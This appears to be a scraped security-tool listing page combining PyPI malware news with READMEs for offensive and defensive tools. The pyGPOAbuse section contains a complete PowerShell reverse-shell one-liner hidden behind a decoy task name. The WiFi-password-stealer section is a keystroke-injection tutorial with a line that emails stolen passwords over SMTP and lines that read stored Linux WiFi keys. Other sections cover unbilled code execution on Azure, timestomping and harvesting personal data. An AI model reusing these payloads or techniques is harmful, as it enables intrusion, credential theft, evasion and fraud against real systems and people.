    Cybersecurity researchers have discovered two malicious packages on the Python Package Index (PyPI) repository that were found leveraging a technique called&nbsp;DLL side-loading&nbsp;to circumvent detection by security software and run malicious code. The packages, named&nbsp;NP6HelperHttptest&nbsp;and&nbsp;NP6HelperHttper, were each downloaded&nbsp;537&nbsp;and&nbsp;166 times, respectively,

    MrHandler - Linux Incident Response Reporting

    By: Zion3R

    Β 


    MR.Handler is a specialized tool designed for responding to security incidents on Linux systems. It connects to target systems via SSH to execute a range of diagnostic commands, gathering crucial information such as network configurations, system logs, user accounts, and running processes. At the end of its operation, the tool compiles all the gathered data into a comprehensive HTML report. This report details both the specifics of the incident response process and the current state of the system, enabling security analysts to more effectively assess and respond to incidents.



    π—œπ—‘π—¦π—§π—”π—Ÿπ—Ÿπ—”π—§π—œπ—’π—‘ π—œπ—‘π—¦π—§π—₯π—¨π—–π—§π—œπ—’π—‘π—¦
      $ pip3 install colorama
    $ pip3 install paramiko
    $ git clone https://github.com/emrekybs/BlueFish.git
    $ cd MrHandler
    $ chmod +x MrHandler.py
    $ python3 MrHandler.py


    Report



    CloudMiner - Execute Code Using Azure Automation Service Without Getting Charged

    By: Zion3R


    Execute code within Azure Automation service without getting charged

    Description

    CloudMiner is a tool designed to get free computing power within Azure Automation service. The tool utilizes the upload module/package flow to execute code which is totally free to use. This tool is intended for educational and research purposes only and should be used responsibly and with proper authorization.

    • This flow was reported to Microsoft on 3/23 which decided to not change the service behavior as it's considered as "by design". As for 3/9/23, this tool can still be used without getting charged.

    • Each execution is limited to 3 hours


    Requirements

    1. Python 3.8+ with the libraries mentioned in the file requirements.txt
    2. Configured Azure CLI - https://learn.microsoft.com/en-us/cli/azure/install-azure-cli
      • Account must be logged in before using this tool

    Installation

    pip install .

    Usage

    usage: cloud_miner.py [-h] --path PATH --id ID -c COUNT [-t TOKEN] [-r REQUIREMENTS] [-v]

    CloudMiner - Free computing power in Azure Automation Service

    optional arguments:
    -h, --help show this help message and exit
    --path PATH the script path (Powershell or Python)
    --id ID id of the Automation Account - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Automation/a
    utomationAccounts/{automationAccountName}
    -c COUNT, --count COUNT
    number of executions
    -t TOKEN, --token TOKEN
    Azure access token (optional). If not provided, token will be retrieved using the Azure CLI
    -r REQUIREMENTS, --requirements REQUIREMENTS
    Path to requirements file to be installed and use by the script (relevant to Python scripts only)
    -v, --verbose Enable verbose mode

    Example usage

    Python

    Powershell

    License

    CloudMiner is released under the BSD 3-Clause License. Feel free to modify and distribute this tool responsibly, while adhering to the license terms.

    Author - Ariel Gamrian



    Stompy - Timestomp Tool To Flatten MAC Times With A Specific Timestamp

    By: Zion3R


    A PowerShell function to perform timestomping on specified files and directories. The function can modify timestamps recursively for all files in a directory.

    • Change timestamps for individual files or directories.
    • Recursively apply timestamps to all files in a directory.
    • Option to use specific credentials for remote paths or privileged files.

    I've ported Stompy to C#, Python and Go and the relevant versions are linked in this repo with their own readme.

    Usage

    • -Path: The path to the file or directory whose timestamps you wish to modify.
    • -NewTimestamp: The new DateTime value you wish to set for the file or directory.
    • -Credentials: (Optional) If you need to specify a different user's credentials.
    • -Recurse: (Switch) If specified, apply the timestamp recursively to all files in the given directory.

    Usage Examples

    Specify the -Recurse switch to apply timestamps recursively:

    1. Change the timestamp of an individual file:
    Invoke-Stompy -Path "C:\path\to\file.txt" -NewTimestamp "01/01/2023 12:00:00 AM"
    1. Recursively change timestamps for all files in a directory:
    Invoke-Stompy -Path "C:\path\to\file.txt" -NewTimestamp "01/01/2023 12:00:00 AM" -Recurse 
    1. Use specific credentials:

    Uscrapper - Powerful OSINT Webscraper For Personal Data Collection

    By: Zion3R


    Introducing Uscrapper 2.0, A powerfull OSINT webscrapper that allows users to extract various personal information from a website. It leverages web scraping techniques and regular expressions to extract email addresses, social media links, author names, geolocations, phone numbers, and usernames from both hyperlinked and non-hyperlinked sources on the webpage, supports multithreading to make this process faster, Uscrapper 2.0 is equipped with advanced Anti-webscrapping bypassing modules and supports webcrawling to scrape from various sublinks within the same domain. The tool also provides an option to generate a report containing the extracted details.


    Extracted Details:

    Uscrapper extracts the following details from the provided website:

    • Email Addresses: Displays email addresses found on the website.
    • Social Media Links: Displays links to various social media platforms found on the website.
    • Author Names: Displays the names of authors associated with the website.
    • Geolocations: Displays geolocation information associated with the website.
    • Non-Hyperlinked Details: Displays non-hyperlinked details found on the website including email addresses phone numbers and usernames.

    Whats New?:

    Uscrapper 2.0:

    • Introduced multiple modules to bypass anti-webscrapping techniques.
    • Introducing Crawl and scrape: an advanced crawl and scrape module to scrape the websites from within.
    • Implemented Multithreading to make these processes faster.

    Installation Steps:

    git clone https://github.com/z0m31en7/Uscrapper.git
    cd Uscrapper/install/ 
    chmod +x ./install.sh && ./install.sh #For Unix/Linux systems

    Usage:

    To run Uscrapper, use the following command-line syntax:

    python Uscrapper-v2.0.py [-h] [-u URL] [-c (INT)] [-t THREADS] [-O] [-ns]


    Arguments:

    • -h, --help: Show the help message and exit.
    • -u URL, --url URL: Specify the URL of the website to extract details from.
    • -c INT, --crawl INT: Specify the number of links to crawl
    • -t INT, --threads INT: Specify the number of threads to use while crawling and scraping.
    • -O, --generate-report: Generate a report file containing the extracted details.
    • -ns, --nonstrict: Display non-strict usernames during extraction.

    Note:

    • Uscrapper relies on web scraping techniques to extract information from websites. Make sure to use it responsibly and in compliance with the website's terms of service and applicable laws.

    • The accuracy and completeness of the extracted details depend on the structure and content of the website being analyzed.

    • To bypass some Anti-Webscrapping methods we have used selenium which can make the overall process slower.

    Contribution:

    Want a new feature to be added?

    • Make a pull request with all the necessary details and it will be merged after a review.
    • You can contribute by making the regular expressions more efficient and accurate, or by suggesting some more features that can be added.


    pyGPOAbuse - Partial Python Implementation Of SharpGPOAbuse

    By: Zion3R


    Python partial implementation of SharpGPOAbuse by@pkb1s

    This tool can be used when a controlled account can modify an existing GPO that applies to one or more users & computers. It will create an immediate scheduled task as SYSTEM on the remote computer for computer GPO, or as logged in user for user GPO.

    Default behavior adds a local administrator.


    How to use

    Basic usage

    Add john user to local administrators group (Password: H4x00r123..)

    ./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"

    Advanced usage

    Reverse shell example

    ./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \ 
    -powershell \
    -command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \
    -taskname "Completely Legit Task" \
    -description "Dis is legit, pliz no delete" \
    -user

    Credits



    WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)

    By: Zion3R


    Have you ever watched a film where a hacker would plug-in, seemingly ordinary, USB drive into a victim's computer and steal data from it? - A proper wet dream for some.

    Disclaimer: All content in this project is intended for security research purpose only.

    Β 

    Introduction

    During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).

    Setup

    After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.

    Prerequisites

    • Physical access to victim's computer.

    • Unlocked victim's computer.

    • Victim's computer has to have an internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.

    • Knowledge of victim's computer password for the Linux exploit.

    Requirements - What you'll need


    • Raspberry Pi Pico (RPi Pico)
    • Micro USB to USB Cable
    • Jumper Wire (optional)
    • pico-ducky - Transformed RPi Pico into a USB Rubber Ducky
    • USB flash drive (for the exploit over physical medium only)


    Note:

    • It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.

    • However, while pico-ducky is a good and budget-friedly solution, Rubber Ducky does offer things like stealthiness and usage of the lastest DuckyScript version.

    • In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.

    Keystroke injection tool

    Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.

    Keystroke injection

    The payload uses STRING command processes keystroke for injection. It accepts one or more alphanumeric/punctuation characters and will type the remainder of the line exactly as-is into the target machine. The ENTER/SPACE will simulate a press of keyboard keys.

    Delays

    We use DELAY command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a Command Line to load. Delay is useful when used at the very beginning when a new USB device is connected to a targeted computer. Initially, the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs setup time is very short. In most cases, it takes a fraction of a second, because the drivers are built-in. However, in some instances, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.

    Exfiltration

    Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, adversary can package it to avoid detection while sending data over the network, using encryption or compression. Two most common way of exfiltration are:

    • Exfiltration over the network medium.
      • This approach was used for the Windows exploit. The whole payload can be seen here.

    • Exfiltration over a physical medium.
      • This approach was used for the Linux exploit. The whole payload can be seen here.

    Windows exploit

    In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.

    Sending stolen data over email

    Once passwords have been exported to the .txt file, payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions visit a following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL and yours email PASSWORD. In addition, you could also update the body and the subject of the email.

    STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587

     Note:

    • After sending data over the email, the .txt file is deleted.

    • You can also use some an SMTP from another email provider, but you should be mindful of SMTP server and port number you will write in the payload.

    • Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.

    Linux exploit

    In order to use the Linux payload (payload2.dd) you need to connect a jumper wire between GND and GPIO5 in order to comply with the code in code.py on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.

    Storing stolen data to USB flash drive

    Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.

    STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt

    STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt

    In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.

    STRING echo PASSWORD | sudo -S echo

    STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"

    Bash script

    In order to run the wifi_passwords_print.sh script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:

    echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK

    where PASSWORD is your account's password and USBSTICK is the name for your USB device.

    Quick overview of the payload

    NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. It uses .ini-style keyfile format and stores network configuration profiles. The keyfile is a plugin that supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with regex in order to extract data of interest. For file filtering, a modified positive lookbehind assertion was used ((?<=keyword)). While the positive lookbehind assertion will match at a certain position in the string, sc. at a position right after the keyword without making that text itself part of the match, the regex (?<=keyword).* will match any text after the keyword. This allows the payload to match the values after SSID and psk (pre-shared key) keywords.

    For more information about NetworkManager here is some useful links:

    Exfiltrated data formatting

    Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.

    Wireless_Network_Name Password
    --------------------- --------
    WLAN1 pass1
    WLAN2 pass2
    WLAN3 pass3

    USB Mass Storage Device Problem

    One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once plugged into the computer, all the machine sees it as a USB keyboard. This isn't a default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.

    ο’‘ Tip:

    • Upload your payload to RPi Pico before you connect the pins.
    • Don't solder the pins because you will probably want to change/update the payload at some point.

    Payload Writer

    When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, a name of the OS (windows or linux) and the name of the payload file (e.q. payload1.dd). Below you can find an example how to run the writer script when creating a Windows payload.

    python3 writer.py windows payload1.dd

    Limitations/Drawbacks

    • This pico-ducky currently works only on Windows OS.

    • This attack requires physical access to an unlocked device in order to be successfully deployed.

    • The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admins password for the Linux machine.

    • Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.

    • Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.

    • The pico-ducky device isn't really stealthy, actually it's quite the opposite, it's really bulky especially if you solder the pins.

    • Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.

    • If the Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.

    • If the computer has a non-English Environment set, this exploit won't be successful.

    • Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.

    To-Do List

    • Fix Caps Lock bug.
    • Fix non-English Environment bug.
    • Obfuscate the command prompt.
    • Implement exfiltration over a physical medium.
    • Create a payload for Linux.
    • Encode/Encrypt exfiltrated data before sending it over email.
    • Implement indicator of successfully completed exploit.
    • Implement command history clean-up for Linux exploit.
    • Enhance the Linux exploit in order to avoid usage of sudo.


    Pantheon - Insecure Camera Parser

    By: Zion3R


    Pantheon is a GUI application that allows users to display information regarding network cameras in various countries as well as an integrated live-feed for non-protected cameras.

    Functionalities

    Pantheon allows users to execute an API crawler. There was original functionality without the use of any API's (like Insecam), but Google TOS kept getting in the way of the original scraping mechanism.


    Installation

    1. git clone https://github.com/josh0xA/Pantheon.git
    2. cd Pantheon
    3. pip3 install -r requirements.txt
      Execution: python3 pantheon.py
    • Note: I will later add a GUI installer to make it fully indepenent of a CLI

    Windows

    • You can just follow the steps above or download the official package here.
    • Note, the PE binary of Pantheon was put together using pyinstaller, so Windows Defender might get a bit upset.

    Ubuntu

    • First, complete steps 1, 2 and 3 listed above.
    • chmod +x distros/ubuntu_install.sh
    • ./distros/ubuntu_install.sh

    Debian and Kali Linux

    • First, complete steps 1, 2 and 3 listed above.
    • chmod +x distros/debian-kali_install.sh
    • ./distros/debian-kali_install.sh

    MacOS

    • The regular installation steps above should suffice. If not, open up an issue.

    Usage

    (Enter) on a selected IP:Port to establish a Pantheon webview of the camera. (Use this at your own risk)

    (Left-click) on a selected IP:Port to view the geolocation of the camera.
    (Right-click) on a selected IP:Port to view the HTTP data of the camera (Ctrl+Left-click for Mac).

    Adjust the map as you please to see the markers.

    • Also note that this app is far from perfect and not every link that shows up is a live-feed, some are login pages (Do NOT attempt to login).

    Ethical Notice

    The developer of this program, Josh Schiavone, is not resposible for misuse of this data gathering tool. Pantheon simply provides information that can be indexed by any modern search engine. Do not try to establish unauthorized access to live feeds that are password protected - that is illegal. Furthermore, if you do choose to use Pantheon to view a live-feed, do so at your own risk. Pantheon was developed for educational purposes only. For further information, please visit: https://joshschiavone.com/panth_info/panth_ethical_notice.html

    Licence

    MIT License
    Copyright (c) Josh Schiavone



    PySQLRecon - Offensive MSSQL Toolkit Written In Python, Based Off SQLRecon

    By: Zion3R


    PySQLRecon is a Python port of the awesome SQLRecon project by @sanjivkawa. See the commands section for a list of capabilities.


    Install

    PySQLRecon can be installed with pip3 install pysqlrecon or by cloning this repository and running pip3 install .

    Commands

    All of the main modules from SQLRecon have equivalent commands. Commands noted with [PRIV] require elevated privileges or sysadmin rights to run. Alternatively, commands marked with [NORM] can likely be run by normal users and do not require elevated privileges.

    Support for impersonation ([I]) or execution on linked servers ([L]) are denoted at the end of the command description.

    adsi                 [PRIV] Obtain ADSI creds from ADSI linked server [I,L]
    agentcmd [PRIV] Execute a system command using agent jobs [I,L]
    agentstatus [PRIV] Enumerate SQL agent status and jobs [I,L]
    checkrpc [NORM] Enumerate RPC status of linked servers [I,L]
    clr [PRIV] Load and execute .NET assembly in a stored procedure [I,L]
    columns [NORM] Enumerate columns within a table [I,L]
    databases [NORM] Enumerate databases on a server [I,L]
    disableclr [PRIV] Disable CLR integration [I,L]
    disableole [PRIV] Disable OLE automation procedures [I,L]
    disablerpc [PRIV] Disable RPC and RPC Out on linked server [I]
    disablexp [PRIV] Disable xp_cmdshell [I,L]
    enableclr [PRIV] Enable CLR integration [I,L]
    enableole [PRIV] Enable OLE automation procedures [I,L]
    enablerpc [PRIV] Enable RPC and RPC Out on linked server [I]
    enablexp [PRIV] Enable xp_cmdshell [I,L]
    impersonate [NORM] Enumerate users that can be impersonated
    info [NORM] Gather information about the SQL server
    links [NORM] Enumerate linked servers [I,L]
    olecmd [PRIV] Execute a system command using OLE automation procedures [I,L]
    query [NORM] Execute a custom SQL query [I,L]
    rows [NORM] Get the count of rows in a table [I,L]
    search [NORM] Search a table for a column name [I,L]
    smb [NORM] Coerce NetNTLM auth via xp_dirtree [I,L]
    tables [NORM] Enu merate tables within a database [I,L]
    users [NORM] Enumerate users with database access [I,L]
    whoami [NORM] Gather logged in user, mapped user and roles [I,L]
    xpcmd [PRIV] Execute a system command using xp_cmdshell [I,L]

    Usage

    PySQLRecon has global options (available to any command), with some commands introducing additional flags. All global options must be specified before the command name:

    pysqlrecon [GLOBAL_OPTS] COMMAND [COMMAND_OPTS]

    View global options:

    pysqlrecon --help

    View command specific options:

    pysqlrecon [GLOBAL_OPTS] COMMAND --help

    Change the database authenticated to, or used in certain PySQLRecon commands (query, tables, columns rows), with the --database flag.

    Target execution of a PySQLRecon command on a linked server (instead of the SQL server being authenticated to) using the --link flag.

    Impersonate a user account while running a PySQLRecon command with the --impersonate flag.

    --link and --impersonate and incompatible.

    Development

    pysqlrecon uses Poetry to manage dependencies. Install from source and setup for development with:

    git clone https://github.com/tw1sm/pysqlrecon
    cd pysqlrecon
    poetry install
    poetry run pysqlrecon --help

    Adding a Command

    PySQLRecon is easily extensible - see the template and instructions in resources

    TODO

    • Add SQLRecon SCCM commands
    • Add Azure SQL DB support?

    References and Credits



    MacMaster - MAC Address Changer

    By: Zion3R


    MacMaster is a versatile command line tool designed to change the MAC address of network interfaces on your system. It provides a simple yet powerful solution for network anonymity and testing.

    Features

    • Custom MAC Address: Set a specific MAC address to your network interface.
    • Random MAC Address: Generate and set a random MAC address.
    • Reset to Original: Reset the MAC address to its original hardware value.
    • Custom OUI: Set a custom Organizationally Unique Identifier (OUI) for the MAC address.
    • Version Information: Easily check the version of MacMaster you are using.

    Installation

    MacMaster requires Python 3.6 or later.

    1. Clone the repository:
      $ git clone https://github.com/HalilDeniz/MacMaster.git
    2. Navigate to the cloned directory:
      cd MacMaster
    3. Install the package:
      $ python setup.py install

    Usage

    $ macmaster --help         
    usage: macmaster [-h] [--interface INTERFACE] [--version]
    [--random | --newmac NEWMAC | --customoui CUSTOMOUI | --reset]

    MacMaster: Mac Address Changer

    options:
    -h, --help show this help message and exit
    --interface INTERFACE, -i INTERFACE
    Network interface to change MAC address
    --version, -V Show the version of the program
    --random, -r Set a random MAC address
    --newmac NEWMAC, -nm NEWMAC
    Set a specific MAC address
    --customoui CUSTOMOUI, -co CUSTOMOUI
    Set a custom OUI for the MAC address
    --reset, -rs Reset MAC address to the original value

    Arguments

    • --interface, -i: Specify the network interface.
    • --random, -r: Set a random MAC address.
    • --newmac, -nm: Set a specific MAC address.
    • --customoui, -co: Set a custom OUI for the MAC address.
    • --reset, -rs: Reset MAC address to the original value.
    • --version, -V: Show the version of the program.
    1. Set a specific MAC address:
      $ macmaster.py -i eth0 -nm 00:11:22:33:44:55
    2. Set a random MAC address:
      $ macmaster.py -i eth0 -r
    3. Reset MAC address to its original value:
      $ macmaster.py -i eth0 -rs
    4. Set a custom OUI:
      $ macmaster.py -i eth0 -co 08:00:27
    5. Show program version:
      $ macmaster.py -V

    Replace eth0 with your desired network interface.

    Note

    You must run this script as root or use sudo to run this script for it to work properly. This is because changing a MAC address requires root privileges.

    Contributing

    Contributions are welcome! To contribute to MacMaster, follow these steps:

    1. Fork the repository.
    2. Create a new branch for your feature or bug fix.
    3. Make your changes and commit them.
    4. Push your changes to your forked repository.
    5. Open a pull request in the main repository.

    Contact

    For any inquiries or further information, you can reach me through the following channels:

    Contact



    NetworkSherlock - Powerful And Flexible Port Scanning Tool With Shodan

    By: Zion3R


    NetworkSherlock is a powerful and flexible port scanning tool designed for network security professionals and penetration testers. With its advanced capabilities, NetworkSherlock can efficiently scan IP ranges, CIDR blocks, and multiple targets. It stands out with its detailed banner grabbing capabilities across various protocols and integration with Shodan, the world's premier service for scanning and analyzing internet-connected devices. This Shodan integration enables NetworkSherlock to provide enhanced scanning capabilities, giving users deeper insights into network vulnerabilities and potential threats. By combining local port scanning with Shodan's extensive database, NetworkSherlock offers a comprehensive tool for identifying and analyzing network security issues.


    Features

    • Scans multiple IPs, IP ranges, and CIDR blocks.
    • Supports port scanning over TCP and UDP protocols.
    • Detailed banner grabbing feature.
    • Ping check for identifying reachable targets.
    • Multi-threading support for fast scanning operations.
    • Option to save scan results to a file.
    • Provides detailed version information.
    • Colorful console output for better readability.
    • Shodan integration for enhanced scanning capabilities.
    • Configuration file support for Shodan API key.

    Installation

    NetworkSherlock requires Python 3.6 or later.

    1. Clone the repository:
      git clone https://github.com/HalilDeniz/NetworkSherlock.git
    2. Install the required packages:
      pip install -r requirements.txt

    Configuration

    Update the networksherlock.cfg file with your Shodan API key:

    [SHODAN]
    api_key = YOUR_SHODAN_API_KEY

    Usage

    Port Scan Tool positional arguments: target Target IP address(es), range, or CIDR (e.g., 192.168.1.1, 192.168.1.1-192.168.1.5, 192.168.1.0/24) options: -h, --help show this help message and exit -p PORTS, --ports PORTS Ports to scan (e.g. 1-1024, 21,22,80, or 80) -t THREADS, --threads THREADS Number of threads to use -P {tcp,udp}, --protocol {tcp,udp} Protocol to use for scanning -V, --version-info Used to get version information -s SAVE_RESULTS, --save-results SAVE_RESULTS File to save scan results -c, --ping-check Perform ping check before scanning --use-shodan Enable Shodan integration for additional information " dir="auto">
    python3 networksherlock.py --help
    usage: networksherlock.py [-h] [-p PORTS] [-t THREADS] [-P {tcp,udp}] [-V] [-s SAVE_RESULTS] [-c] target

    NetworkSherlock: Port Scan Tool

    positional arguments:
    target Target IP address(es), range, or CIDR (e.g., 192.168.1.1, 192.168.1.1-192.168.1.5,
    192.168.1.0/24)

    options:
    -h, --help show this help message and exit
    -p PORTS, --ports PORTS
    Ports to scan (e.g. 1-1024, 21,22,80, or 80)
    -t THREADS, --threads THREADS
    Number of threads to use
    -P {tcp,udp}, --protocol {tcp,udp}
    Protocol to use for scanning
    -V, --version-info Used to get version information
    -s SAVE_RESULTS, --save-results SAVE_RESULTS
    File to save scan results
    -c, --ping-check Perform ping check before scanning
    --use-shodan Enable Shodan integration for additional information

    Basic Parameters

    • target: The target IP address(es), IP range, or CIDR block to scan.
    • -p, --ports: Ports to scan (e.g., 1-1000, 22,80,443).
    • -t, --threads: Number of threads to use.
    • -P, --protocol: Protocol to use for scanning (tcp or udp).
    • -V, --version-info: Obtain version information during banner grabbing.
    • -s, --save-results: Save results to the specified file.
    • -c, --ping-check: Perform a ping check before scanning.
    • --use-shodan: Enable Shodan integration.

    Example Usage

    Basic Port Scan

    Scan a single IP address on default ports:

    python networksherlock.py 192.168.1.1

    Custom Port Range

    Scan an IP address with a custom range of ports:

    python networksherlock.py 192.168.1.1 -p 1-1024

    Multiple IPs and Port Specification

    Scan multiple IP addresses on specific ports:

    python networksherlock.py 192.168.1.1,192.168.1.2 -p 22,80,443

    CIDR Block Scan

    Scan an entire subnet using CIDR notation:

    python networksherlock.py 192.168.1.0/24 -p 80

    Using Multi-Threading

    Perform a scan using multiple threads for faster execution:

    python networksherlock.py 192.168.1.1-192.168.1.5 -p 1-1024 -t 20

    Scanning with Protocol Selection

    Scan using a specific protocol (TCP or UDP):

    python networksherlock.py 192.168.1.1 -p 53 -P udp

    Scan with Shodan

    python networksherlock.py 192.168.1.1 --use-shodan

    Scan Multiple Targets with Shodan

    python networksherlock.py 192.168.1.1,192.168.1.2 -p 22,80,443 -V --use-shodan

    Banner Grabbing and Save Results

    Perform a detailed scan with banner grabbing and save results to a file:

    python networksherlock.py 192.168.1.1 -p 1-1000 -V -s results.txt

    Ping Check Before Scanning

    Scan an IP range after performing a ping check:

    python networksherlock.py 10.0.0.1-10.0.0.255 -c

    OUTPUT EXAMPLE

    $ python3 networksherlock.py 10.0.2.12 -t 25 -V -p 21-6000 -t 25
    ********************************************
    Scanning target: 10.0.2.12
    Scanning IP : 10.0.2.12
    Ports : 21-6000
    Threads : 25
    Protocol : tcp
    ---------------------------------------------
    Port Status Service VERSION
    22 /tcp open ssh SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
    21 /tcp open telnet 220 (vsFTPd 2.3.4)
    80 /tcp open http HTTP/1.1 200 OK
    139 /tcp open netbios-ssn %SMBr
    25 /tcp open smtp 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
    23 /tcp open smtp #' #'
    445 /tcp open microsoft-ds %SMBr
    514 /tcp open shell
    512 /tcp open exec Where are you?
    1524/tcp open ingreslock ro ot@metasploitable:/#
    2121/tcp open iprop 220 ProFTPD 1.3.1 Server (Debian) [::ffff:10.0.2.12]
    3306/tcp open mysql >
    5900/tcp open unknown RFB 003.003
    53 /tcp open domain
    ---------------------------------------------

    OutPut Example

    $ python3 networksherlock.py 10.0.2.0/24 -t 10 -V -p 21-1000
    ********************************************
    Scanning target: 10.0.2.1
    Scanning IP : 10.0.2.1
    Ports : 21-1000
    Threads : 10
    Protocol : tcp
    ---------------------------------------------
    Port Status Service VERSION
    53 /tcp open domain
    ********************************************
    Scanning target: 10.0.2.2
    Scanning IP : 10.0.2.2
    Ports : 21-1000
    Threads : 10
    Protocol : tcp
    ---------------------------------------------
    Port Status Service VERSION
    445 /tcp open microsoft-ds
    135 /tcp open epmap
    ********************************************
    Scanning target: 10.0.2.12
    Scanning IP : 10.0.2.12
    Ports : 21- 1000
    Threads : 10
    Protocol : tcp
    ---------------------------------------------
    Port Status Service VERSION
    21 /tcp open ftp 220 (vsFTPd 2.3.4)
    22 /tcp open ssh SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
    23 /tcp open telnet #'
    80 /tcp open http HTTP/1.1 200 OK
    53 /tcp open kpasswd 464/udpcp
    445 /tcp open domain %SMBr
    3306/tcp open mysql >
    ********************************************
    Scanning target: 10.0.2.20
    Scanning IP : 10.0.2.20
    Ports : 21-1000
    Threads : 10
    Protocol : tcp
    ---------------------------------------------
    Port Status Service VERSION
    22 /tcp open ssh SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9

    Contributing

    Contributions are welcome! To contribute to NetworkSherlock, follow these steps:

    1. Fork the repository.
    2. Create a new branch for your feature or bug fix.
    3. Make your changes and commit them.
    4. Push your changes to your forked repository.
    5. Open a pull request in the main repository.

    Contact



    116 Malware Packages Found on PyPI Repository Infecting Windows and Linux Systems

    Cybersecurity researchers have identified a set of 116 malicious packages on the Python Package Index (PyPI) repository that are designed to infect Windows and Linux systems with a custom backdoor. "In some cases, the final payload is a variant of the infamous&nbsp;W4SP Stealer, or a simple clipboard monitor to steal cryptocurrency, or both," ESET researchers Marc-Etienne M.LΓ©veillΓ© and Rene

    New MrAnon Stealer Malware Targeting German Users via Booking-Themed Scam

    A phishing campaign has been observed delivering an information stealer malware called&nbsp;MrAnon Stealer&nbsp;to unsuspecting victims via seemingly benign booking-themed PDF lures. "This malware is a Python-based information stealer compressed with cx-Freeze to evade detection," Fortinet FortiGuard Labs researcher Cara Lin&nbsp;said. "MrAnon Stealer steals its victims' credentials, system

    Py-Amsi - Scan Strings Or Files For Malware Using The Windows Antimalware Scan Interface

    By: Zion3R


    py-amsi is a library that scans strings or files for malware using the Windows Antimalware Scan Interface (AMSI) API. AMSI is an interface native to Windows that allows applications to ask the antivirus installed on the system to analyse a file/string. AMSI is not tied to Windows Defender. Antivirus providers implement the AMSI interface to receive calls from applications. This library takes advantage of the API to make antivirus scans in python. Read more about the Windows AMSI API here.


    Installation

    • Via pip

      pip install pyamsi
    • Clone repository

      git clone https://github.com/Tomiwa-Ot/py-amsi.git
      cd py-amsi/
      python setup.py install

